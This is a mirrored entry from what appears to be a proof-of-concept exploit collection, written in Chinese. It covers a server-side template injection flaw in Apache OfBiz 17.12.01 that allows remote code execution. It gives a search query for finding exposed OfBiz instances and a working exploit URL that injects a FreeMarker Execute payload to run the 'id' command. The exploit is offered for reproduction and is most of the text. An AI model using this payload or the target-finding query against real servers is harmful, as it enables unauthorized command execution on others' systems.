mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-04 18:27:48 +00:00
478 B
478 B
Apache OfBiz 远程代码执行 RCE
漏洞描述
Apache OfBiz 17.12.01 容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行(RCE)。
参考链接:
网络测绘
app="Apache_OFBiz"
漏洞复现
poc:
https://localhost/ordermgr/control/FindRequest?foo=bar"ajaxEnabled=false/>${"freemarker.template.utility.Execute"?new()("id")}<FOO